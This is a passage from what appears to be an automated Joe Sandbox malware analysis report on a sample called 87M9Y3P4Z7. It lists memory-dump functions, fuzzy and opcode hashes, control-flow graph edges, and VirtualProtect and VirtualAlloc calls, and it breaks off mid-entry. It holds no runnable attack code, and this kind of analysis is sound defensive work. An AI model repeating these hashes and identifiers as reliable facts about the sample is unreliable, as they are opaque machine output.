                                                                                                            • API String ID: 0-4088798008
                                                                                                            • Opcode ID: 951684f03f5a9c36ce89e8155c5f54218d482a8504fd18c9ec30dee09ba29ed0
                                                                                                            • Instruction ID: e23744d1c4c844d67cfb6fd40ac9ebb2e6543ae3629e54648278b9f7e4180e28
                                                                                                            • Opcode Fuzzy Hash: 951684f03f5a9c36ce89e8155c5f54218d482a8504fd18c9ec30dee09ba29ed0
                                                                                                            • Instruction Fuzzy Hash: 0DB2E834A00218DFDB14DFA8C895BADB7B6BF48701F148199E909EB2A9DB70ED45CF50
                                                                                                            Function 088CC9F7 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2289353636.00000000088C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_88c0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4
                                                                                                            • API String ID: 0-4088798008
                                                                                                            • Opcode ID: 63cee5a384167b67b376a71ad49dc255fffd88511bbb4a779f4c805376fe2685
                                                                                                            • Instruction ID: 62f60e494c17a14f83ff9a3b07e1397076a553585345947bd36e40125ee6f8ac
                                                                                                            • Opcode Fuzzy Hash: 63cee5a384167b67b376a71ad49dc255fffd88511bbb4a779f4c805376fe2685
                                                                                                            • Instruction Fuzzy Hash: 6322D934A01215CFDB24DFA4C994BA9B7B2BF48305F1481ADE909EB695DB70ED82CF50
                                                                                                            Function 088C85D6 Relevance: 1.6, Strings: 1, Instructions: 369COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1178 88c85d6-88c8604 1181 88c8606-88c860c 1178->1181 1182 88c860e 1181->1182 1183 88c8615-88c8616 1181->1183 1182->1183 1184 88c86cf-88c870f 1182->1184 1185 88c87df-88c8861 call 88c8290 1182->1185 1186 88c887a-88c88bf 1182->1186 1187 88c861b-88c86be call 88c8290 1182->1187 1188 88c8722-88c87da 1182->1188 1183->1188 1184->1181 1203 88c8715-88c871d 1184->1203 1276 88c8867 call 88c8f80 1185->1276 1277 88c8867 call 88c8f71 1185->1277 1201 88c88c9-88c88ce 1186->1201 1202 88c88c1-88c88c7 1186->1202 1187->1181 1219 88c86c4-88c86ca 1187->1219 1188->1181 1204 88c88d0-88c88d1 1201->1204 1205 88c88d3-88c8921 1201->1205 1202->1201 1203->1181 1204->1205 1217 88c892b-88c8930 1205->1217 1218 88c8923-88c8929 1205->1218 1214 88c886d-88c8875 1214->1181 1221 88c8935-88c8952 1217->1221 1222 88c8932-88c8933 1217->1222 1218->1217 1219->1181 1278 88c8958 call 88c9260 1221->1278 1279 88c8958 call 88c9270 1221->1279 1222->1221 1224 88c895e-88c8977 1225 88c8979-88c8981 1224->1225 1226 88c8983-88c8989 1224->1226 1225->1226 1227 88c898b 1226->1227 1228 88c8992-88c8993 1226->1228 1227->1228 1229 88c8a6f-88c8aa3 1227->1229 1230 88c8aa8 1227->1230 1231 88c8b08-88c8b51 1227->1231 1232 88c8c29-88c8c2a 1227->1232 1233 88c8aa5-88c8aa6 1227->1233 1234 88c89e1-88c8a04 1227->1234 1235 88c8b5d-88c8b5e 1227->1235 1236 88c8998-88c89df 1227->1236 1237 88c8a15-88c8a32 1227->1237 1238 88c8c95-88c8ce3 1227->1238 1239 88c8bd0-88c8c1c 1227->1239 1240 88c8cf2-88c8cf3 1227->1240 1228->1237 1259 88c8a5d-88c8a63 1229->1259 1242 88c8aa9 1230->1242 1251 88c8af6-88c8afc 1231->1251 1272 88c8b53-88c8b5b 1231->1272 1254 88c8c80-88c8c89 1232->1254 1233->1242 1234->1226 1244 88c8a0a-88c8a10 1234->1244 1255 88c8bbb-88c8bc4 1235->1255 1236->1226 1237->1229 1252 88c8a34-88c8a4b 1237->1252 1238->1254 1273 88c8ce5-88c8cf0 1238->1273 1239->1255 1275 88c8c1e-88c8c27 1239->1275 1256 88c8cf4 1240->1256 1242->1251 1244->1226 1257 88c8afe 1251->1257 1258 88c8b05-88c8b06 1251->1258 1252->1259 1260 88c8a4d-88c8a55 1252->1260 1262 88c8c8b 1254->1262 1263 88c8c92-88c8c93 1254->1263 1266 88c8bcd-88c8bce 1255->1266 1267 88c8bc6 1255->1267 1256->1256 1257->1231 1257->1232 1257->1235 1257->1238 1257->1239 1257->1240 1258->1231 1264 88c8a6c-88c8a6d 1259->1264 1265 88c8a65 1259->1265 1260->1259 1262->1238 1262->1240 1263->1238 1264->1229 1265->1229 1265->1230 1265->1231 1265->1232 1265->1233 1265->1235 1265->1238 1265->1239 1265->1240 1265->1264 1266->1232 1266->1239 1267->1232 1267->1238 1267->1239 1267->1240 1272->1251 1273->1254 1275->1255 1276->1214 1277->1214 1278->1224 1279->1224
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2289353636.00000000088C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_88c0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: EGD
                                                                                                            • API String ID: 0-1479070358
                                                                                                            • Opcode ID: 9eb769d3f6ded3b4539c177026046949f06ab8091d0c38e7b0f517eafa114b96
                                                                                                            • Instruction ID: b7fc0988455cdd5007fd95d81f0989f166db96cc99daf588819c3babfec7d695
                                                                                                            • Opcode Fuzzy Hash: 9eb769d3f6ded3b4539c177026046949f06ab8091d0c38e7b0f517eafa114b96
                                                                                                            • Instruction Fuzzy Hash: 5AF12674A41219CFDB64DFA8D884B9DBBB2FB89305F1081A9D519E7349CB70AD86CF01
                                                                                                            Function 028BF4E0 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1375 28bf4e0-28bf4fd 1376 28bf502 1375->1376 1377 28bf504-28bf507 1376->1377 1378 28bf509 1377->1378 1379 28bf525-28bf529 1377->1379 1378->1379 1380 28bf78b-28bf799 1378->1380 1381 28bf7cf-28bf7d3 1378->1381 1382 28bf582-28bf599 1378->1382 1383 28bf606-28bf623 1378->1383 1384 28bf758-28bf760 1378->1384 1385 28bf79e-28bf7a2 1378->1385 1386 28bf5dd-28bf5ea 1378->1386 1387 28bf812-28bf820 1378->1387 1388 28bf651-28bf670 1378->1388 1389 28bf510-28bf521 1378->1389 1390 28bf5ae-28bf5b4 1378->1390 1391 28bf6ae-28bf6cd 1378->1391 1392 28bf566-28bf57b 1378->1392 1393 28bf6e6-28bf6ee 1378->1393 1394 28bf7e6-28bf7ea 1378->1394 1395 28bf765-28bf77d 1378->1395 1396 28bf825-28bf831 1378->1396 1397 28bf5a4-28bf5a8 1378->1397 1398 28bf67e-28bf682 1378->1398 1399 28bf73d-28bf741 1378->1399 1400 28bf6f3-28bf70f 1378->1400 1401 28bf633-28bf644 1378->1401 1402 28bf7b2-28bf7ca 1378->1402 1403 28bf536-28bf543 1378->1403 1379->1391 1404 28bf52f-28bf534 1379->1404 1380->1377 1409 28bf832-28bf837 1381->1409 1417 28bf7d5-28bf7e1 1381->1417 1382->1377 1406 28bf59f 1382->1406 1428 28bf629-28bf62e 1383->1428 1429 28bf544 call 28bee60 1383->1429 1384->1377 1385->1390 1407 28bf7a8-28bf7ad 1385->1407 1387->1377 1388->1377 1411 28bf676-28bf679 1388->1411 1389->1377 1419 28bf523 1389->1419 1408 28bf5ba-28bf5cf 1390->1408 1390->1409 1391->1409 1413 28bf6d3-28bf6e1 1391->1413 1392->1377 1405 28bf57d-28bf580 1392->1405 1393->1377 1394->1409 1418 28bf7ec-28bf804 1394->1418 1395->1377 1416 28bf783-28bf786 1395->1416 1397->1390 1397->1407 1398->1409 1412 28bf688-28bf6a0 1398->1412 1399->1409 1415 28bf747-28bf753 1399->1415 1400->1409 1414 28bf715-28bf72f 1400->1414 1401->1377 1410 28bf64a-28bf64c 1401->1410 1402->1377 1404->1377 1405->1377 1406->1377 1407->1377 1408->1377 1421 28bf5d5-28bf5d8 1408->1421 1410->1377 1411->1377 1412->1377 1424 28bf6a6-28bf6a9 1412->1424 1413->1377 1414->1377 1420 28bf735-28bf738 1414->1420 1415->1376 1416->1377 1417->1377 1418->1377 1423 28bf80a-28bf80d 1418->1423 1419->1377 1420->1377 1421->1377 1423->1377 1424->1377 1428->1377 1431 28bf549-28bf54b 1429->1431 1432 28bf5eb-28bf601 1431->1432 1433 28bf551-28bf562 1431->1433 1432->1377 1433->1377 1434 28bf564 1433->1434 1434->1377
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2262171066.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_28b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID: 0-3916222277
                                                                                                            • Opcode ID: 16d348bb6df04123062667249648254f98164d8d8565f1d739871c4a8a8d45ea
                                                                                                            • Instruction ID: 5deda0d4a6e7eb72508896c87318ce997a05a03f82cac39a3abca6f88096e22c
                                                                                                            • Opcode Fuzzy Hash: 16d348bb6df04123062667249648254f98164d8d8565f1d739871c4a8a8d45ea
                                                                                                            • Instruction Fuzzy Hash: 63913B78A00109CBDB25CF68C8447EAB7B2FF94305F1485A9E616DBB64C735A886CF91
                                                                                                            Function 08C4EF98 Relevance: .3, Instructions: 276COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2292181466.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_8c30000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f3ed4c00f7a42a48d8023712cccc7a806936cbe0510d56a62de6ac0e3fbb4639
                                                                                                            • Instruction ID: 9685c15887f8ae74ab4e5d2fae1fd76ba4365ceb69b7c7014a9326941616fbfe
                                                                                                            • Opcode Fuzzy Hash: f3ed4c00f7a42a48d8023712cccc7a806936cbe0510d56a62de6ac0e3fbb4639
                                                                                                            • Instruction Fuzzy Hash: 25D1C374E11259CFDB54DFA9D994A9DBBB2FF88300F1080A9D409AB361DB31AD86CF50
                                                                                                            Function 06E41660 Relevance: 2.7, Strings: 1, Instructions: 1432COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2283085953.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e40000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0lyr
                                                                                                            • API String ID: 0-3495216982
                                                                                                            • Opcode ID: 1f81aa79abd53b37622024f725947d01fe75907b848c2ec788cc0aa472e34b43
                                                                                                            • Instruction ID: 0b215c47c6fb9ec790dc9585397e4713d6133fcaf699ff4ba1a232db35a5f160
                                                                                                            • Opcode Fuzzy Hash: 1f81aa79abd53b37622024f725947d01fe75907b848c2ec788cc0aa472e34b43
                                                                                                            • Instruction Fuzzy Hash: 96B25870E09384DFDB569B74D814BBA7FB1AF46304F19809AE544CF2A2D631DC85C7A2
                                                                                                            Function 028BB786 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 469 28bb786 470 28bb790-28bb798 469->470 471 28bb7a0-28bb7b9 470->471 472 28bb7bb-28bb7c2 471->472 473 28bb772-28bb778 471->473 472->473 474 28bb77a 473->474 475 28bb781 473->475 474->469 476 28bb7ca-28bb7e2 474->476 477 28bb85e-28bb886 474->477 478 28bbb49-28bbb57 474->478 479 28bb7e9-28bb802 474->479 480 28bba39-28bba46 474->480 481 28bba0d-28bba27 474->481 482 28bb8a2-28bb8a6 474->482 483 28bbad0 474->483 484 28bb8c7-28bb8cc 474->484 485 28bb8d6-28bb8f1 474->485 475->476 475->477 476->473 502 28bbb0a-28bbb24 477->502 503 28bb88c-28bb893 477->503 478->473 479->473 489 28bb808-28bb80f 479->489 480->485 499 28bba4c-28bba53 480->499 481->473 490 28bba2d-28bba34 481->490 486 28bb898-28bb89d 482->486 487 28bb8a8-28bb8af 482->487 488 28bbca8-28bbcbf 484->488 485->473 486->482 494 28bbc71-28bbc8a 486->494 487->473 488->473 491 28bbcc5-28bbcca 488->491 489->473 490->473 491->473 494->473 498 28bbc90-28bbc97 494->498 498->473 498->488 499->473 502->478
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2262171066.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_28b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $#
                                                                                                            • API String ID: 0-2491617062
                                                                                                            • Opcode ID: e035abd2b22c42cd58aa9382f8657f153552bb09a62621f4e4b344c402e10c36
                                                                                                            • Instruction ID: a2358f100c65e0d5f0f4bfc0defff318d1ac25af206f9e43b418770f42c10f78
                                                                                                            • Opcode Fuzzy Hash: e035abd2b22c42cd58aa9382f8657f153552bb09a62621f4e4b344c402e10c36
                                                                                                            • Instruction Fuzzy Hash: 5F41EF78901608CFDB11CF99C848BEDBBB1FF4A308F008169D816A77A0D7789846CF29
                                                                                                            Function 028BBB8B Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 504 28bbb8b-28bbbc1 508 28bb772-28bb778 504->508 509 28bbbc7-28bbbce 504->509 511 28bb77a 508->511 512 28bb781 508->512 509->508 510 28bbca8-28bbcbf 509->510 510->508 513 28bbcc5-28bbcca 510->513 514 28bb7ca-28bb7e2 511->514 515 28bb85e-28bb886 511->515 516 28bbb49-28bbb57 511->516 517 28bb7e9-28bb802 511->517 518 28bba39-28bba46 511->518 519 28bba0d-28bba27 511->519 520 28bb8a2-28bb8a6 511->520 521 28bbad0 511->521 522 28bb8c7-28bb8cc 511->522 523 28bb8d6-28bb8f1 511->523 524 28bb786-28bb798 511->524 512->514 512->515 513->508 514->508 542 28bbb0a-28bbb24 515->542 543 28bb88c-28bb893 515->543 516->508 517->508 527 28bb808-28bb80f 517->527 518->523 537 28bba4c-28bba53 518->537 519->508 528 28bba2d-28bba34 519->528 525 28bb898-28bb89d 520->525 526 28bb8a8-28bb8af 520->526 522->510 523->508 538 28bb7a0-28bb7b9 524->538 525->520 532 28bbc71-28bbc8a 525->532 526->508 527->508 528->508 532->508 536 28bbc90-28bbc97 532->536 536->508 536->510 537->508 538->508 540 28bb7bb-28bb7c2 538->540 540->508 542->516
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2262171066.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_28b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $#
                                                                                                            • API String ID: 0-2491617062
                                                                                                            • Opcode ID: 2098e45bce78e574f9bfe30fdbcab9d51920df6d983d66956123dcaf794f085a
                                                                                                            • Instruction ID: 519652fd8ed05314f084ab2d0705a7fbedbf3446c3dcb11bc7dc84eb84601f6b
                                                                                                            • Opcode Fuzzy Hash: 2098e45bce78e574f9bfe30fdbcab9d51920df6d983d66956123dcaf794f085a
                                                                                                            • Instruction Fuzzy Hash: 7B410F78901609CFDB12CF99D848BEDBBB1FF49308F004169D815A77A0D7789946CF28
                                                                                                            Function 089BD4F8 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1366 89bd4f8-89bd5ac VirtualProtect 1369 89bd5ae-89bd5b4 1366->1369 1370 89bd5b5-89bd5fd 1366->1370 1369->1370
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 089BD59C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2290944282.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_89b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: b031d83dcb157543997157c4f6f8761d50102b65d42774daa61f151663b93c54
                                                                                                            • Instruction ID: 901efa4efbd68db44176380be3635429154673fa0a8633fd27879a4ee81ae321
                                                                                                            • Opcode Fuzzy Hash: b031d83dcb157543997157c4f6f8761d50102b65d42774daa61f151663b93c54
                                                                                                            • Instruction Fuzzy Hash: 5E31A7B4D012489FDF10DFA9D980ADEFBB0AB49320F24942AE815B7210D775A945CF98
                                                                                                            Function 089BE6C0 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1436 89be6c0-89be76f VirtualAlloc 1439 89be778-89be7c0 1436->1439 1440 89be771-89be777 1436->1440 1440->1439
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 089BE75F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2290944282.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_89b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 47082f7ca37c47f672ffb8a55e6516d5aa6f5d75bba1c007dfe70930f65c828d
                                                                                                            • Instruction ID: 60ab03a94e615b8197a8da3b923a46068b7920b7f1e301000e45e3dfbadf8c88
                                                                                                            • Opcode Fuzzy Hash: 47082f7ca37c47f672ffb8a55e6516d5aa6f5d75bba1c007dfe70930f65c828d
                                                                                                            • Instruction Fuzzy Hash: 9D31B8B8D012589FDF10CFA9D980ADEFBB4AF49320F24942AE814B7210C735A941CF98
                                                                                                            Function 088C65E9 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1445 88c65e9-88c661a 1446 88c661c 1445->1446 1447 88c6621-88c66e9 1445->1447 1446->1447 1460 88c66f0-88c66fc 1447->1460
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2289353636.00000000088C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_88c0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: b&v
                                                                                                            • API String ID: 0-2149105869
                                                                                                            • Opcode ID: 135886e84ddd5c5f29f1f5794109943ed8a29ab495db95f93507fc48077b8087
                                                                                                            • Instruction ID: d326a22cd2efa5454b7d0719f19d4bd3e156661d1c11b66a45fc9916ae9bab9c
                                                                                                            • Opcode Fuzzy Hash: 135886e84ddd5c5f29f1f5794109943ed8a29ab495db95f93507fc48077b8087
                                                                                                            • Instruction Fuzzy Hash: AE312474E01249DFCB09DFA8D854AEEBBB2FF88300F10806AE406A7365DB315941CFA1
                                                                                                            Function 088C65F8 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1461 88c65f8-88c661a 1462 88c661c 1461->1462 1463 88c6621-88c66e9 1461->1463 1462->1463 1476 88c66f0-88c66fc 1463->1476
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2289353636.00000000088C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_88c0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: b&v
                                                                                                            • API String ID: 0-2149105869
                                                                                                            • Opcode ID: a06010a31ab647ccfe0d16706a865f272e14f40bba5dc3c10565d29d5a5ab993
                                                                                                            • Instruction ID: 35d146ff369e3744b05a447dd1316ccd7fe291b5d191f8ee3d2a4097df01d9f2
                                                                                                            • Opcode Fuzzy Hash: a06010a31ab647ccfe0d16706a865f272e14f40bba5dc3c10565d29d5a5ab993
                                                                                                            • Instruction Fuzzy Hash: 91311474E01209DFCB08DFA8D854AEEBBB2FF88300F10802AE916A7365DB715941CF91
                                                                                                            Function 088C04E6 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1531 88c04e6-88c04ea 1532 88c04f0-88c0519 1531->1532 1533 88c20f1 1531->1533 1536 88c013d-88c08c7 1532->1536 1537 88c051f-88c052a 1532->1537 1549 88c20f7 call 88c6580 1533->1549 1550 88c20f7 call 88c6570 1533->1550 1534 88c20fd-88c213d 1534->1536 1542 88c2143-88c214e 1534->1542 1543 88c08cd-88c08f6 1536->1543 1544 88c3b60-88c3b8f 1536->1544 1537->1536 1542->1536 1543->1536 1548 88c08fc-88c0907 1543->1548 1544->1536 1547 88c3b95-88c3ba0 1544->1547 1547->1536 1548->1536 1549->1534 1550->1534
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2289353636.00000000088C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_88c0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (
                                                                                                            • API String ID: 0-3887548279
                                                                                                            • Opcode ID: 15644dd31213647923f3eea0a651072f00291d56cb2c54de6e440e9cf3f44875
                                                                                                            • Instruction ID: 49e1601ea4698645e7b7dc56889c8c6ad36d83deb320df426520d9113b7fed5c
                                                                                                            • Opcode Fuzzy Hash: 15644dd31213647923f3eea0a651072f00291d56cb2c54de6e440e9cf3f44875
                                                                                                            • Instruction Fuzzy Hash: CB119578910629CFEB608F14DC487D9BAB0FB05346F1081EED459E2645D7B48AC9CF41
                                                                                                            Function 06E43F88 Relevance: .6, Instructions: 577COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2283085953.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e40000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 863f4f7e493ab2fd4aa6f0b0f3c861e5be9b2f8a82fff00dfd6c92c2c4f7d17a
                                                                                                            • Instruction ID: b7b7fdd76c80c46dc23b6df365d73ca4f20213b21d8e022101b2727b62be2480
                                                                                                            • Opcode Fuzzy Hash: 863f4f7e493ab2fd4aa6f0b0f3c861e5be9b2f8a82fff00dfd6c92c2c4f7d17a
                                                                                                            • Instruction Fuzzy Hash: 5E42D734E00219CFEB55EFA4E448AEEB7F1FB88314F109559DA12A7394C734A986CF91
                                                                                                            Function 088CF7F8 Relevance: .5, Instructions: 536COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2289353636.00000000088C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_88c0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 79514b5dffcd92ccc11f88d627495f50b47483bece4c0ff58218808caa1ce7e7
                                                                                                            • Instruction ID: 532594d0a0975da6f3bcca6870ded8fb8b5b541e35849e0b77dd7fdcbc8eb29a
                                                                                                            • Opcode Fuzzy Hash: 79514b5dffcd92ccc11f88d627495f50b47483bece4c0ff58218808caa1ce7e7
                                                                                                            • Instruction Fuzzy Hash: 43226D35A002199FEB14CF69D894AADBBB2FF88315F14805DE906DB3A5CB75EC41CB90
                                                                                                            Function 028B96C0 Relevance: .5, Instructions: 457COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2262171066.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_28b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f672c8e66fbd058999d8cc5b96d534a00d930ab50b470c07d0b9a9bdf392afc4
                                                                                                            • Instruction ID: e253f8f779ac60db4665709198b65694f0d496c6a4c0bc77b3bd618fd4222637
                                                                                                            • Opcode Fuzzy Hash: f672c8e66fbd058999d8cc5b96d534a00d930ab50b470c07d0b9a9bdf392afc4
                                                                                                            • Instruction Fuzzy Hash: AB120879A00219DFDB06CF98D484ADEBBB2EF49314F248159E905AB361C735EC92CF90
                                                                                                            Function 06E44AB0 Relevance: .4, Instructions: 362COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2283085953.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e40000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1fdda4595356bc247258a780de95a34d6c5ca61800171e29b8c2bf6d35f94224
                                                                                                            • Instruction ID: d736f13d7021eeb9e38559faf68e3fb661b6faffbe356d869a2b3da1d6a0bc75
                                                                                                            • Opcode Fuzzy Hash: 1fdda4595356bc247258a780de95a34d6c5ca61800171e29b8c2bf6d35f94224
                                                                                                            • Instruction Fuzzy Hash: 2AF19134E01318DFDB54EFA8E4986ACBBB2FF89305F205969E406AB395CB345985CF41
                                                                                                            Function 028B80EB Relevance: .3, Instructions: 341COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2262171066.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_28b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c935150a6e80f7a0f7add62b439ed99c8937e5c132110b0a9a8d6a083d96caaa
                                                                                                            • Instruction ID: 458cf8b80571bfd783c9bcadd91fb1682710021e948749698c5f4719ca801402
                                                                                                            • Opcode Fuzzy Hash: c935150a6e80f7a0f7add62b439ed99c8937e5c132110b0a9a8d6a083d96caaa
                                                                                                            • Instruction Fuzzy Hash: FDD11939600605DFDB18DF68C890EAD77F2FF89314B1085A8E9069B765DB31EC45CB90
                                                                                                            Function 028B73A8 Relevance: .3, Instructions: 317COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2262171066.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_28b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ef291d2de1f42a94b67ce289a2539e760d3f2bc06aa3d3846dc798ce57f24bf
